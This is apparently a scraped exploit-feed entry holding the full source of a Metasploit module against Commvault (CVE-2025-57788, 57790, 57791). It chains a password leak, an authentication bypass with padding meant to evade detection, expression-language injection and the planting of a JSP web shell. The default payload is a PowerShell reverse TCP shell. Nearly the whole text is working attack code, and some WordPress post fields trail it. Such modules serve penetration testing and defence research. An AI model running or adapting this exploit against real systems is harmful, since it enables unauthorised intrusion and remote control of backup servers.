{“lastseen”:”2025-09-17T17:19:18″,”description”:”This Metasploit module exploits an unauthenticated…”,”published”:”2025-09-17T00:00:00″,”modified”:”2025-09-17T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 Commvault CLI Argument Injection \/ Traversal \/ Remote Code Execution”,”source”:””,”references”:””,”id”:”PACKETSTORM:209626″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2025-4428″,”CVE-2025-57788″,”CVE-2025-57790″,”CVE-2025-57791″],”sourceData”:”##\\n # This module requires Metasploit: https:\/\/metasploit.com\/download\\n # Current source: https:\/\/github.com\/rapid7\/metasploit-framework\\n ##\\n \\n class MetasploitModule \\u003c Msf::Exploit::Remote\\n Rank = ExcellentRanking\\n \\n prepend Msf::Exploit::Remote::AutoCheck\\n include Msf::Exploit::Remote::HttpClient\\n include Msf::Exploit::FileDropper\\n \\n def initialize(info = {})\\n super(\\n update_info(\\n info,\\n ‘Name’ =\\u003e ‘Commvault Command-Line Argument Injection to Traversal Remote Code Execution’,\\n ‘Description’ =\\u003e %q{\\n This module exploits an unauthenticated remote code execution exploit chain for Commvault,\\n tracked as CVE-2025-57790 and CVE-2025-57791. A command-line injection permits unauthenticated\\n access to the ‘localadmin’ account, which then facilitates code execution via expression\\n language injection. CVE-2025-57788 is also leveraged to leak the target host name, which is\\n necessary knowledge to exploit the remote code execution chain. This module executes in\\n the context of ‘NETWORK SERVICE’ on Windows.\\n },\\n ‘License’ =\\u003e MSF_LICENSE,\\n ‘Author’ =\\u003e [\\n ‘Sonny Macdonald’, # Original discovery\\n ‘Piotr Bazydlo’, # Original discovery\\n ‘remmons-r7’ # MSF exploit\\n ],\\n ‘References’ =\\u003e [\\n [‘CVE’, ‘2025-57790’],\\n [‘CVE’, ‘2025-57791’],\\n [‘CVE’, ‘2025-57788’],\\n # Argument injection advisory\\n [‘URL’, ‘https:\/\/documentation.commvault.com\/securityadvisories\/CV_2025_08_1.html’],\\n # Path traversal advisory\\n [‘URL’, ‘https:\/\/documentation.commvault.com\/securityadvisories\/CV_2025_08_2.html’],\\n # Non-blind expression language payload (from an Ivanti EPMM exploit chain)\\n [‘URL’, ‘https:\/\/blog.eclecticiq.com\/china-nexus-threat-actor-actively-exploiting-ivanti-endpoint-manager-mobile-cve-2025-4428-vulnerability’]\\n ],\\n ‘DisclosureDate’ =\\u003e ‘2025-08-19’,\\n # Runs as the ‘NETWORK SERVICE’ user on Windows\\n ‘Privileged’ =\\u003e false,\\n # Although Linux installations are also affected, I didn’t establish a reliable full path leak on the older Linux version I tested\\n ‘Platform’ =\\u003e [‘windows’],\\n ‘Arch’ =\\u003e [ARCH_CMD],\\n ‘DefaultTarget’ =\\u003e 0,\\n ‘Targets’ =\\u003e [\\n [\\n ‘Default’, {\\n ‘DefaultOptions’ =\\u003e {\\n ‘PAYLOAD’ =\\u003e ‘cmd\/windows\/powershell_reverse_tcp’,\\n ‘SSL’ =\\u003e true\\n },\\n ‘Payload’ =\\u003e {\\n # The ampersand character isn’t properly embedded in payloads sent to the web API, so use a base64 PowerShell command instead\\n ‘BadChars’ =\\u003e ‘\\u0026’\\n }\\n }\\n ]\\n ],\\n ‘Notes’ =\\u003e {\\n # Confirmed to work multiple times in a row\\n ‘Stability’ =\\u003e [CRASH_SAFE],\\n ‘Reliability’ =\\u003e [REPEATABLE_SESSION],\\n # The log files will contain IOCs, including the written web shell path\\n # If successful, an abnormal XML file and web shell will be written to disk (will attempt automatic cleanup of JSP file)\\n # The localadmin user’s description will be updated to include the expression language payload (although this should be reverted)\\n ‘SideEffects’ =\\u003e [IOC_IN_LOGS, ARTIFACTS_ON_DISK, CONFIG_CHANGES]\\n }\\n )\\n )\\n \\n register_options(\\n [\\n Opt::RPORT(443),\\n OptString.new(‘TARGETURI’, [true, ‘The base path to Commvault’, ‘\/’])\\n ]\\n )\\n end\\n \\n def check\\n # Query an unauthenticated web API endpoint to attempt to extract the PublicSharingUser GUID password\\n res = check_commvault_info\\n \\n return CheckCode::Unknown(‘Failed to get a response from the target’) unless res\\n \\n # If the response body contains \\”cv-gorkha\\”, we assume it’s Commvault\\n if res.code == 200 \\u0026\\u0026 res.body.include?(‘cv-gorkha’)\\n vprint_status(‘The server returned a body that included the string cv-gorkha, looks like Commvault’)\\n \\n regex = \/\\”cv-gorkha\\\\\\\\\\”:\\\\\\\\\\”([a-zA-Z0-9-]+)\\\\\\\\\\”\/\\n sharinguser_pass = res.body.scan(regex)[0][0]\\n \\n # If the regex fails to extract the GUID, we return Safe\\n if sharinguser_pass.blank?\\n return CheckCode::Safe(‘The target returned an unexpected response that did not contain the desired GUID’)\\n end\\n \\n vprint_good(\\”Fetched GUID: #{sharinguser_pass}\\”)\\n \\n vprint_status(‘Attempting to login as PublicSharingUser’)\\n res = login_as_publicsharinguser(sharinguser_pass)\\n \\n return CheckCode::Unknown(‘Failed to get a response from the target’) unless res\\n \\n if res.code != 200\\n CheckCode::Detected(‘Commvault detected, login as PublicSharingUser failed because a non-200 status was returned’)\\n end\\n \\n # Extract the token from the login response\\n regex = \/(QSDK [a-zA-Z0-9]+)\/\\n psu_token = res.body.scan(regex)[0][0]\\n \\n if psu_token.blank?\\n CheckCode::Detected(‘Commvault detected, login as PublicSharingUser failed because no token was returned’)\\n else\\n vprint_good(\\”Authenticated as PublicSharingUser, got token: #{psu_token}\\”)\\n return CheckCode::Vulnerable(‘Successfully authenticated as PublicSharingUser’)\\n end\\n \\n else\\n return CheckCode::Safe(‘The target server did not provide a response with the expected password leak’)\\n end\\n end\\n \\n def check_commvault_info\\n vprint_status(‘Attempting to query the publicLink.do endpoint’)\\n send_request_cgi(\\n ‘method’ =\\u003e ‘GET’,\\n ‘uri’ =\\u003e normalize_uri(target_uri.path, ‘commandcenter’, ‘publicLink.do’)\\n )\\n end\\n \\n def leak_target_info\\n # The ‘activeMQConnectionURL’ leak depicted in the finder blog post is not present on many systems by default\\n # CVE-2025-57788 can be exploited to access an authenticated web API endpoint that leaks host name and OS info\\n psu_pass = extract_publicsharinguser_pass\\n \\n vprint_status(\\”Attempting PublicServiceUser login using: #{psu_pass}\\”)\\n res = login_as_publicsharinguser(psu_pass)\\n \\n fail_with(Failure::Unknown, ‘Failed to get a response from the target’) unless res\\n \\n if res.code != 200\\n fail_with(Failure::NotVulnerable, ‘Login as PublicSharingUser failed (non-200 status), the target is likely not vulnerable’)\\n end\\n \\n # Extract the token from the login response\\n regex = \/(QSDK [a-zA-Z0-9]+)\/\\n psu_token = res.body.scan(regex)[0][0]\\n \\n if psu_token.blank?\\n fail_with(Failure::NotVulnerable, ‘Login as PublicSharingUser failed (no token returned), the target is likely not vulnerable’)\\n end\\n \\n vprint_good(\\”Authenticated as PublicSharingUser, got token: #{psu_token}\\”)\\n \\n res = get_host_info(psu_token)\\n \\n fail_with(Failure::Unknown, ‘Failed to get a response from the target’) unless res\\n \\n if res.code != 200\\n fail_with(Failure::Unknown, ‘Failed to get host info, the target returned a non-200 status’)\\n end\\n \\n regex = \/hostName=\\”([^\\”]+)\\” \/\\n # Extract value, and make sure it isn’t a FQDN for systems that are joined to a domain (strip period and anything after, if present)\\n hostname = res.body.scan(regex)[0][0].split(‘.’).first\\n \\n regex = \/osType=\\”([^\\”]+)\\” \/\\n target_os = res.body.scan(regex)[0][0]\\n \\n if hostname.blank? || target_os.blank?\\n fail_with(Failure::UnexpectedReply, ‘The target response unexpectedly did not provide a host name or OS string’)\\n end\\n \\n return hostname, target_os\\n end\\n \\n def extract_publicsharinguser_pass\\n # Fetch and extract the GUID that serves double-duty as the internal _+*PublicSharingUser_* user’s password\\n res = check_commvault_info\\n \\n fail_with(Failure::Unknown, ‘Failed to get a response from the target’) unless res\\n \\n # If the response body contains \\”cv-gorkha\\”, we assume it’s Commvault\\n if res.code == 200 \\u0026\\u0026 res.body.include?(‘cv-gorkha’)\\n vprint_status(‘The server returned a body that included the string cv-gorkha, looks like Commvault’)\\n \\n regex = \/\\”cv-gorkha\\\\\\\\\\”:\\\\\\\\\\”([a-zA-Z0-9-]+)\\\\\\\\\\”\/\\n sharinguser_pass = res.body.scan(regex)[0][0]\\n \\n # If the regex fails to extract the GUID, we return NoAccess\\n if sharinguser_pass.blank? \\u0026\\u0026 hostname.blank?\\n fail_with(Failure::NoAccess, ‘The target server is Commvault, but the PublicSharingUser password could not be leaked’)\\n end\\n \\n vprint_good(\\”Fetched GUID: #{sharinguser_pass}\\”)\\n return sharinguser_pass\\n else\\n fail_with(Failure::UnexpectedReply, ‘The target server did not provide a response with the expected password leak’)\\n end\\n end\\n \\n def login_as_publicsharinguser(password)\\n # Use the leaked GUID value to login as the _+*PublicSharingUser_* user (CVE-2025-57788)\\n # This level of access is used to leak the host name via a low-privilege authenticated API endpoint\\n \\n send_request_cgi(\\n ‘method’ =\\u003e ‘POST’,\\n ‘uri’ =\\u003e normalize_uri(target_uri.path, ‘commandcenter’, ‘api’, ‘Login’),\\n ‘ctype’ =\\u003e ‘application\/json’,\\n ‘data’ =\\u003e {\\n ‘username’ =\\u003e ‘_+_PublicSharingUser_’,\\n # Passwords are base64 encoded for login\\n ‘password’ =\\u003e Base64.strict_encode64(password)\\n }.to_json\\n )\\n end\\n \\n def get_host_info(token)\\n # Extract the host name and OS from an authenticated API as PublicServiceUser\\n vprint_status(‘Attempting to query authenticated API endpoint to get host name and OS’)\\n \\n send_request_cgi(\\n ‘method’ =\\u003e ‘GET’,\\n ‘uri’ =\\u003e normalize_uri(target_uri.path, ‘commandcenter’, ‘api’, ‘CommServ’),\\n ‘headers’ =\\u003e {\\n ‘Authtoken’ =\\u003e token\\n }\\n )\\n end\\n \\n def bypass_authentication(hostname)\\n # Bypass authentication and return a valid token for the internal localadmin user\\n vprint_status(\\”Attempting to mint a localadmin token using hostname: #{hostname}\\”)\\n \\n send_request_cgi(\\n ‘method’ =\\u003e ‘POST’,\\n ‘uri’ =\\u003e normalize_uri(target_uri.path, ‘commandcenter’, ‘api’, ‘Login’),\\n ‘ctype’ =\\u003e ‘application\/json’,\\n ‘data’ =\\u003e {\\n # Username must contain the valid system host name\\n ‘username’ =\\u003e \\”#{hostname}_localadmin__\\”,\\n # Since the malicious password to bypass authentication is a static string, randomly pad with spaces to subvert easy static detections\\n ‘password’ =\\u003e Base64.strict_encode64(\\”#{‘ ‘ * rand(1..8)}a#{‘ ‘ * rand(1..8)}-localadmin#{‘ ‘ * rand(1..8)}\\”),\\n # Must contain the valid system host name, cannot be padded with spaces\\n ‘commserver’ =\\u003e \\”#{hostname} -cs #{hostname}\\”\\n }.to_json\\n )\\n end\\n \\n def leak_full_path(token)\\n # Since we need to provide a full filesystem path to write the web shell, we need to know what the installation path is\\n # We’ll attempt to use an authenticated API to leak this information\\n send_request_cgi(\\n ‘method’ =\\u003e ‘GET’,\\n ‘uri’ =\\u003e normalize_uri(target_uri.path, ‘commandcenter’, ‘api’, ‘Workflow’),\\n ‘ctype’ =\\u003e ‘application\/json’,\\n ‘headers’ =\\u003e {\\n ‘Authtoken’ =\\u003e token,\\n ‘Accept’ =\\u003e ‘application\/json’\\n }\\n )\\n end\\n \\n def get_user_desc(token, uid)\\n # Grab the pre-existing user description to reinstate after exploitation\\n res = send_request_cgi(\\n ‘method’ =\\u003e ‘GET’,\\n ‘ctype’ =\\u003e ‘application\/json’,\\n ‘uri’ =\\u003e normalize_uri(target_uri.path, ‘commandcenter’, ‘RestServlet’, ‘User’, uid),\\n ‘headers’ =\\u003e {\\n ‘Authtoken’ =\\u003e token,\\n ‘Accept’ =\\u003e ‘application\/json’\\n }\\n )\\n \\n fail_with(Failure::Unknown, ‘No response when getting user description’) unless res\\n \\n if res.code != 200\\n fail_with(Failure::UnexpectedReply, ‘The target did not return a 200 code when checking the user description’)\\n end\\n \\n res.get_json_document[‘users’][0][‘description’]\\n end\\n \\n def update_user_desc(token, uid, desc)\\n # Perform a request to update the user description\\n xml_data = \\”\\u003cApp_UpdateUserPropertiesRequest\\u003e\\u003cusers\\u003e\\u003cAppMsg.UserInfo\\u003e\\u003cuserEntity\\u003e\\u003cuserId\\u003e#{uid}\\u003c\/userId\\u003e\\u003c\/userEntity\\u003e\\u003cdescription\\u003e#{desc}\\u003c\/description\\u003e\\u003c\/AppMsg.UserInfo\\u003e\\u003c\/users\\u003e\\u003c\/App_UpdateUserPropertiesRequest\\u003e\\”\\n vprint_status(\\”Updating user description: #{xml_data}\\”)\\n \\n send_request_cgi(\\n ‘method’ =\\u003e ‘POST’,\\n ‘ctype’ =\\u003e ‘application\/xml’,\\n ‘uri’ =\\u003e normalize_uri(target_uri.path, ‘commandcenter’, ‘RestServlet’, ‘User’, uid),\\n ‘headers’ =\\u003e {\\n ‘Authtoken’ =\\u003e token\\n },\\n ‘data’ =\\u003e xml_data\\n )\\n end\\n \\n def execute_command(hostname, uid, cmd, token, install_path, prev_desc)\\n # This EL injection payload was taken from EITW of an Ivanti vuln. It’s non-blind, which is a nice benefit\\n # Note that ampersand is a bad character in the injection context\\n payload = \\”${”.getClass().forName(‘java.util.Scanner’).getConstructor(”.getClass().forName(‘java.io.InputStream’)).newInstance(”.getClass().forName(‘java.lang.Runtime’).getMethod(‘getRuntime’).invoke(null).exec(‘#{cmd}’).getInputStream()).useDelimiter(‘%5C%5CA’).next()}\\”\\n \\n # Weaponize unauthenticated file upload to create an XML file that defines an operation to retrieve user details\\n user_details_op_xml = \\”\\u003cApp_GetUserPropertiesRequest level=\\\\\\”30\\\\\\”\\u003e\\\\r\\\\n\\\\t\\u003cuser userName=\\\\\\”#{hostname}_localadmin__\\\\\\” \/\\u003e\\u003c\/App_GetUserPropertiesRequest\\u003e\\”\\n message = Rex::MIME::Message.new\\n \\n # These can be anything. Random hex str to avoid signatures where possible\\n random_str = rand_text_hex(8)\\n message.add_part(random_str, nil, nil, ‘form-data; name=\\”username\\”‘)\\n message.add_part(random_str, nil, nil, ‘form-data; name=\\”password\\”‘)\\n message.add_part(random_str, nil, nil, ‘form-data; name=\\”ccid\\”‘)\\n message.add_part(random_str, nil, nil, ‘form-data; name=\\”uploadToken\\”‘)\\n \\n # File contents to write\\n message.add_part(user_details_op_xml, nil, nil, \\”form-data; name=\\\\\\”file\\\\\\”; filename=\\\\\\”#{random_str}.xml\\\\\\”\\”)\\n \\n vprint_status(\\”Uploading XML file: #{user_details_op_xml}\\”)\\n \\n res = send_request_cgi(\\n ‘method’ =\\u003e ‘POST’,\\n ‘uri’ =\\u003e normalize_uri(target_uri.path, ‘commandcenter’, ‘metrics’, ‘metricsUpload.do’),\\n ‘ctype’ =\\u003e \\”multipart\/form-data; boundary=#{message.bound}\\”,\\n ‘data’ =\\u003e message.to_s\\n )\\n \\n fail_with(Failure::Unknown, ‘No response when uploading XML file’) unless res\\n \\n if res.code != 200\\n vprint_status(\\”Unexpected status code: #{res.code}\\”)\\n fail_with(Failure::UnexpectedReply, ‘Non-200 status code when uploading XML file’)\\n end\\n \\n # The localadmin user’s description is set to EL payload\\n res = update_user_desc(token, uid, payload)\\n \\n fail_with(Failure::Unknown, ‘No response when setting user description’) unless res\\n \\n if res.code != 200\\n fail_with(Failure::UnexpectedReply, ‘The target did not return a 200 code when updating user description’)\\n end\\n \\n # Wrap in begin\/ensure so that the injection in localadmin user description will be cleaned up\\n begin\\n # Move XML file to web shell\\n qcommand_op = \\”qoperation execute -af #{install_path}\\\\\\\\Reports\\\\\\\\MetricsUpload\\\\\\\\Upload\\\\\\\\#{random_str}\\\\\\\\#{random_str}.xml -file #{install_path}\\\\\\\\Apache\\\\\\\\webapps\\\\\\\\ROOT\\\\\\\\#{random_str}.jsp\\”\\n \\n vprint_status(\\”Moving XML file to web shell: #{qcommand_op}\\”)\\n \\n res = send_request_cgi(\\n ‘method’ =\\u003e ‘POST’,\\n ‘ctype’ =\\u003e ‘text\/plain’,\\n ‘uri’ =\\u003e normalize_uri(target_uri.path, ‘commandcenter’, ‘RestServlet’, ‘QCommand’),\\n ‘headers’ =\\u003e {\\n ‘Authtoken’ =\\u003e token\\n },\\n ‘data’ =\\u003e qcommand_op\\n )\\n \\n fail_with(Failure::Unknown, ‘No response when creating web shell’) unless res\\n \\n if res.code != 200 || !res.body.include?(‘Operation Successful.Results written’)\\n fail_with(Failure::UnexpectedReply, ‘The target did not return a 200 code with success message when creating web shell’)\\n end\\n \\n # Register the newly written JSP web shell file for cleanup\\n register_file_for_cleanup(\\”#{install_path}\\\\\\\\Apache\\\\\\\\webapps\\\\\\\\ROOT\\\\\\\\#{random_str}.jsp\\”)\\n \\n # Access the web shell to trigger remote code execution\\n vprint_status(\\”Accessing the web shell file: #{random_str}.jsp\\”)\\n \\n send_request_cgi({\\n ‘method’ =\\u003e ‘GET’,\\n ‘uri’ =\\u003e normalize_uri(target_uri.path, \\”#{random_str}.jsp\\”)\\n }, nil)\\n ensure\\n # Reinstate the pre-existing user description\\n res = update_user_desc(token, uid, prev_desc)\\n \\n fail_with(Failure::Unknown, ‘No response when resetting user description’) unless res\\n \\n if res.code != 200\\n fail_with(Failure::UnexpectedReply, ‘The target did not return a 200 code when resetting user description’)\\n end\\n end\\n end\\n \\n def parse_json(json_inp, hostname)\\n # Extract full path disclosure for the target host from the parameter #1 API response JSON\\n \\n container = Array(json_inp[‘container’])\\n deployments = container.flat_map { |c| Array(c[‘deployments’]) }\\n \\n # Find \\”{drive}:\\\\\\\\\\”\\” + any number of intermediary directories + \\”\\\\\\\\Commvault\\\\\\\\ContentStore\\”, and only where sibling ‘clientName’ is the Commvault server\\n regex = \/([A-Z]:\\\\\\\\(?:[^\\\\\\\\]+\\\\\\\\)*Commvault\\\\\\\\ContentStore)\\\\\\\\?\/i\\n \\n # This gets a little gnarly, but it has worked for all the test data I have tried (including Commvault documentation example responses)\\n # Can’t simply search for Windows file path patterns here, because this API endpoint also returns some file paths from other hosts\\n paths = deployments\\n .select { |d| d.dig(‘client’, ‘clientName’)\\u0026.casecmp?(hostname) }\\n .map { |d| d.dig(‘inputForm’, ‘destPath’) }\\n .compact\\n .map { |p| p.tr(‘\/’, ‘\\\\\\\\’) }\\n .filter_map { |p| p[regex, 1] }\\n \\n if paths.blank?\\n fail_with(Failure::NotFound, ‘The target unexpectedly did not return a full path disclosure’)\\n end\\n \\n # Return the first full path disclosure and swap the double backslashes for single (for use in QOperation rejects double backslashes)\\n paths[0].gsub(‘\\\\\\\\\\\\\\\\’, ‘\\\\\\\\’)\\n end\\n \\n def exploit\\n # Leak the PublicSharingUser GUID password, authenticate, then query an authenticated API endpoint for target info\\n leaked = leak_target_info\\n \\n hostname = leaked[0]\\n target_os = leaked[1]\\n \\n if hostname.blank? || target_os.blank?\\n fail_with(Failure::Unknown, ‘Unexpectedly unable to query target system details as PublicSharingUser’)\\n end\\n \\n vprint_good(\\”Got target host name: #{hostname}\\”)\\n vprint_good(\\”Got target host OS: #{target_os}\\”)\\n \\n # Check to confirm the target is supported\\n if (target_os.casecmp(‘windows’) != 0)\\n fail_with(Failure::BadConfig, ‘This module only supports Windows targets’)\\n end\\n \\n # Attempt to use the host name to exploit the authentication bypass and retrieve a localadmin token\\n res = bypass_authentication(hostname)\\n \\n fail_with(Failure::Unknown, ‘Failed to get a response from the target’) unless res\\n \\n # If the response is 200 and includes the token prefix, grab that token\\n if res.code == 200 \\u0026\\u0026 res.body.include?(‘\\”QSDK ‘)\\n print_good(‘Successfully bypassed authentication’)\\n \\n # Extract token for later use (cookie is also persisted)\\n regex = \/(QSDK [a-zA-Z0-9]+)\/\\n admin_token = res.body.scan(regex)[0][0]\\n \\n vprint_status(\\”Admin token: #{admin_token}\\”)\\n \\n # Extract the aliasName field, which contains the dynamic user ID number (typically single digit)\\n regex = \/aliasName[=:]\\”(\\\\d\\\\d?)\/\\n admin_uid = res.body.scan(regex)[0][0]\\n vprint_status(\\”Extracted localadmin user ID number: #{admin_uid}\\”)\\n \\n # If the response doesn’t contain the admin token, the exploit has failed\\n else\\n fail_with(Failure::NoAccess, ‘The authentication bypass failed – the target may not be vulnerable, or perhaps the host name leak failed’)\\n end\\n \\n # Hit the admin-only web API endpoint that leaks one or more full Windows file paths\\n res = leak_full_path(admin_token)\\n \\n fail_with(Failure::Unknown, ‘Failed to get a response from the target’) unless res\\n \\n if res.code != 200\\n fail_with(Failure::Unknown, ‘The target returned a non-200 status when attempting to leak full path’)\\n end\\n \\n # Assign the JSON response body\\n leaked_json = res.get_json_document\\n \\n vprint_status(‘Got JSON response, searching for installation path disclosures’)\\n \\n # Parse the JSON and find entries matching the host name, then walk to an adjacent key to leak installation path\\n install_path = parse_json(leaked_json, hostname)\\n vprint_good(\\”Leaked the installation path: #{install_path}\\”)\\n \\n # Grab the pre-existing user description to reinstate after RCE is established\\n user_desc = get_user_desc(admin_token, admin_uid)\\n \\n vprint_status(\\”Got user description: #{user_desc}\\”)\\n \\n # Plant malicious code in user description, upload XML file for user info, then create the web shell\\n execute_command(hostname, admin_uid, payload.encoded, admin_token, install_path, user_desc)\\n end\\n end”,”sourceHref”:”https:\/\/packetstorm.news\/download\/209626″,”cvss”:{“score”:8.8,”severity”:”HIGH”,”vector”:”CVSS:3.1\/AV:N\/AC:L\/PR:L\/UI:N\/S:U\/C:H\/I:H\/A:H”,”version”:”3.1″},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/packetstorm.news\/files\/id\/209626\/”,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"
{“lastseen”:”2025-09-17T17:19:18″,”description”:”This Metasploit module exploits an unauthenticated…”,”published”:”2025-09-17T00:00:00″,”modified”:”2025-09-17T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 Commvault CLI Argument Injection \/ Traversal \/ Remote Code Execution”,”source”:””,”references”:””,”id”:”PACKETSTORM:209626″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2025-4428″,”CVE-2025-57788″,”CVE-2025-57790″,”CVE-2025-57791″],”sourceData”:”##\\n # This module requires Metasploit: https:\/\/metasploit.com\/download\\n # Current source:…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[6,8,41,12,15,13,53,7,11,5],"class_list":["post-17886","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-cve","tag-cvss","tag-cvss-88","tag-exploit","tag-high","tag-news","tag-packetstorm","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n